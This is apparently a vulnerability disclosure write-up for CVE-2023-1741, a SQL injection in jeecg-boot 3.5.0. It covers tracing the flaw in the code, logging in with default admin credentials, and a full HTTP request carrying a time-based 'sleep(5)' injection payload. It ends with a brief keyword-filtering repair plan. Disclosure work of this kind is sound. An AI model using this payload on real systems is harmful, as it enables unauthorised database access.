Headline
CVE-2023-1741: report/README.md at main · private-null/report
A vulnerability was found in jeecg-boot 3.5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file SysDictMapper.java of the component Sleep Command Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224629 was assigned to this vulnerability.
SQL injection exists in the background interface of Jeecg-boot 3.5.0****Environmental Deployment
Download source code
https://github.com/jeecgboot/jeecg-boot/releases/tag/v3.5.0
Deploy source code through idea
Configure pom and reload dependencies
Green Leaf Launch Project Appears
Vulnerability mining
global search ${
jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/xml/SysDictMapper.xml
There are variable splicing statements in line 106
Click on the duplicate CheckCountSqlNoDataId tag to jump to SysDictMapper.java for the statement with variable splicing in line 106
jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/SysDictMapper.java
After clicking the duplicateCheckCountSqlNoDataId method, jump to the DuplicateCheckController controller
jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/DuplicateCheckController.java
The general meaning of the code logic is that the get method accepts parameters and uses the SqlInjectionUtil method on line 55 to filter keywords, but does not filter sleep
The front-end access interface was tested and found to require X-Access-Token, otherwise it cannot be accessed
Obtain the verification code image
http://192.168.1.103:8080/jeecg-boot/sys/randomImage/9169ea44fee2e773df644053d67c94a1
Copy body data to browser
Access background login address
http://192.168.1.103:8080/jeecg-boot/sys/login
The get method is not supported, burpsuite packet capturing is changed to post
Get token
Get token and add Content Type: application/json Add post data
{
"username":"admin",
"password":"123456",
"remember_me":"true",
"captcha":"mYUw",
"checkKey":"9169ea44fee2e773df644053d67c94a1"
}
Access Vulnerability Interface
http://192.168.1.103:8080/jeecg-boot/#/default/%E9%87%8D%E5%A4%8D%E6%A0%A1%E9%AA%8C/doDuplicateCheckUsingGET
Set X-Access Token
Sending data and capturing packets
Normal data without delay
Enter and% 09sleep (5) for a delay time of five seconds
This is a packet
GET /jeecg-boot/sys/duplicate/check?dataId=2000&fieldName=1+and%09sleep(5)&fieldVal=1000&tableName=sys_log HTTP/1.1
Host: 192.168.1.103:8080
Content-Type: application/x-www-form-urlencoded
Accept: */*
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2Nzk2NDM4OTUsInVzZXJuYW1lIjoiYWRtaW4ifQ.xJCpEt2pg3Zs5MdMYwcggZ85uLZcziQm_Ed1RQyC0kU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51
Request-Origion: Knife4j
Referer: http://192.168.1.103:8080/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Repair plan
These keywords such as and sleep if are also filtered.